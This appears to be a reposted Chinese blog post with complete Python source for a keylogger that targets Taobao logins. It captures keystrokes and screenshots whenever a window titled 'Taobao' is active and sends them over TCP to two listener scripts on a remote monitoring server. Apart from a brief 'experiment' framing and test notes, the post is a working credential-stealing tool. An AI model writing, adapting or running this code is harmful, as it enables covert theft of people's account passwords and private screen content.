|
|
从今天早上产生了写个获取淘宝账号及密码的想法后,到现在,全天都在看书、调试程序,12小时内写了三篇相关博客,如下:
《Python:通过获取淘宝账号和密码的实验,来看登陆方式选择的重要性》
《Python:通过获取淘宝账号和密码的实验,来看登陆方式选择的重要性(二)》
《Python:通过远程监控用户输入来获取淘宝账号和密码的实验(一)》
刚刚把写完了最后一个功能,将用户机器上的抓的图片传送到监控者的服务器上,加之前面实现的各功能,完整程序代码如下:
一、代码:
1、接收消息服务端(hook_server.py)
#!/usr/bin/env python# -*- coding: utf-8 -*-import socketdef hook_tcp_server():'''Function:接收远程机器上发送过来的信息并输入出到终端Input:evenOutput: Tureauthor: socratesblog:http://blog.csdn.net/dyx1024date:2012-03-03''' host = '192.168.1.101'port = 34586buf_size = 1024addr =(host, port)tcp_server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)tcp_server_socket.bind(addr)tcp_server_socket.listen(5)print 'waiting for connectiong...'while True:tcp_client_socket, addr = tcp_server_socket.accept()print 'connected from :', addrwhile True:msg = tcp_client_socket.recv(buf_size)print msgif not msg:breaktcp_client_socket.close()tcp_server_socket.close()if __name__ == '__main__':hook_tcp_server()
2、接收图片的服务器端(hook_pic_server.py)
#!/usr/bin/env python# -*- coding: utf-8 -*-import socketimport structimport timedef hook_pic_file_server():'''Function:接收远程机器上发送过来的图片并保存到本地Input:evenOutput: Tureauthor: socratesblog:http://blog.csdn.net/dyx1024date:2012-03-03''' host = '192.168.1.101'port = 34587buf_size = 1024addr =(host, port)pic_file_size_info = struct.calcsize('128s32sI8s')tcp_server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)tcp_server_socket.bind(addr)tcp_server_socket.listen(5)print 'waiting for connectiong...'while True:tcp_client_socket, addr = tcp_server_socket.accept()print 'connected from :', addrpic_file_head = tcp_client_socket.recv(pic_file_size_info)#接收文件头信息 pic_file_name, temp1, pic_file_size, temp2 = struct.unpack('128s32sI8s', pic_file_head)local_pic_dir = pic_file_name.strip('\0') #接收文件内容pic_fobj = open(local_pic_dir, 'wb')temp_file_size = pic_file_sizewhile True:if temp_file_size > buf_size:pic_file_data = tcp_client_socket.recv(buf_size)else:pic_file_data = tcp_client_socket.recv(temp_file_size)if pic_file_data:pic_fobj.write(pic_file_data)temp_file_size -= len(pic_file_data)if temp_file_size == 0:breakpic_fobj.close()print time.strftime('[%Y-%m-%d %H:%M:%S]: ',time.localtime(time.time()))+ local_pic_dir + ' was received'tcp_client_socket.close() tcp_server_socket.close()if __name__ == '__main__':hook_pic_file_server()
3、客户端(hook_client.py)
#!/usr/bin/env python# -*- coding: utf-8 -*-import pythoncomimport pyHookimport timefrom PIL import ImageGrabimport socketimport structimport osdef send_msg_to_remote(msg):'''Function:向远程服务器发送信息Input:evenOutput: Tureauthor: socratesblog:http://blog.csdn.net/dyx1024date:2012-03-03''' host = '192.168.1.101'port = 34586buf_size = 1024addr =(host, port)if len(msg) != 0:tcp_client_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)try:tcp_client_sock.connect(addr)except IOError, e:print ('Error:%s' % e.args[0])tcp_client_sock.close()data = time.strftime('[%Y-%m-%d %H:%M:%S]',time.localtime(time.time()))tip_info = data + 'from ' + socket.gethostname() + ':'tcp_client_sock.sendall(tip_info + msg)tcp_client_sock.close()def send_pic_file_to_remote(pic_file_name):'''Function:向远程服务器发送图片Input:evenOutput: Tureauthor: socratesblog:http://blog.csdn.net/dyx1024date:2012-03-03''' host = '192.168.1.101' port = 34587buf_size = 1024addr =(host, port) pic_file_size = struct.calcsize('128s32sI8s')pic_client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)try:pic_client_socket.connect(addr)except IOError, e:print ('Error:%s' % e.args[0])pic_client_socket.close() pic_file_head = struct.pack('128s11I', pic_file_name, 0, 0, 0, 0, 0, 0, 0, 0, os.stat(pic_file_name).st_size, 0, 0)#发送文件信息pic_client_socket.send(pic_file_head)#发送文件内容pic_fobj = open(pic_file_name, 'rb')while True:file_data = pic_fobj.read(buf_size)if not file_data:breakpic_client_socket.send(file_data)pic_fobj.close()pic_client_socket.close()def onMouseEvent(event):'''Function:处理鼠标左键单击事件,如果当前MSG中存放了信息,将其写入文件,因为有的用户在输入 完用户名后,不是使用TAB键切换到密码框,而是通过鼠标切换到密码输入窗口这种情况应该属于大多数网民的习惯,所以此处要判断是否通过鼠标切换了输入窗口Input:evenOutput: Tureauthor: socratesblog:http://blog.csdn.net/dyx1024date:2012-03-03'''global MSGif len(MSG) != 0:#屏幕抓图实现pic_name = time.strftime('%Y%m%d%H%M%S',time.localtime(time.time()))pic = ImageGrab.grab()pic_file_name = '%s.png' % pic_namepic.save(pic_file_name) #向服务器发送文字send_msg_to_remote(MSG)MSG = '' #向服务器发送图片send_pic_file_to_remote(pic_file_name)#删除本地保存的图片os.remove(pic_file_name)return Truedef onKeyboardEvent(event): "处理键盘事件" '''Function:处理键盘事件,如果当前窗口为TAOBAO页面,刚开始监控并记录用户输入因为此时用户可能准备输入用户名及密码进行登陆,所以将用户输入的所有可见的ascii字符记录下来,此处要考虑用户是否使用了TAB键或回车键来结束输入,此时要将信息发送给远程服务器。Input:evenOutput: Tureauthor: socratesblog:http://blog.csdn.net/dyx1024date:2012-03-03''' global MSGif event.WindowName.decode('GBK').find(u"淘宝") != -1:if (127 >= event.Ascii > 31) or (event.Ascii == 8):MSG += chr(event.Ascii) if (event.Ascii == 9) or (event.Ascii == 13):#屏幕抓图实现pic_name = time.strftime('%Y%m%d%H%M%S',time.localtime(time.time()))pic = ImageGrab.grab()pic_file_name = '%s.png' % pic_namepic.save(pic_file_name)#向服务器发送文字send_msg_to_remote(MSG)MSG = '' #向服务器发送图片send_pic_file_to_remote(pic_file_name)#删除本地保存的图片os.remove(pic_file_name)return Trueif __name__ == "__main__": '''Function:获取TAOBAO账号及密码,增加抓图功能Input:NONEOutput: NONEauthor: socratesblog:http://blog.csdn.net/dyx1024date:2012-03-03''' MSG = '' #创建hook句柄hm = pyHook.HookManager()#监控鼠标hm.SubscribeMouseLeftDown(onMouseEvent)hm.HookMouse()#监控键盘hm.KeyDown = onKeyboardEventhm.HookKeyboard()#循环获取消息pythoncom.PumpMessages()
二、测试:
1、环境信息:
服务端:
消息接收脚本hook_server.py运行于Unbutu上(IP:192.168.1.101,监听端口:34586)
图片接收脚本hook_pic_server.py运行于Unbutu上(IP:192.168.1.101,监听端口:34587)
客户端:
脚本hook_client.py运行于Windows xp上(主机名:winxp-duanyx)
2.、实测: a、 用户在淘宝上操作之后,查看服务器端shell窗口,有如下信息打印,见下图:
b、查看收到的图片文件:
c、查看linux上收到的文件图片:
|
|
|
QQ群⑧:
窥视卡
雷达卡
发表于 2017-5-8 08:26:17
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
千斤顶
显身卡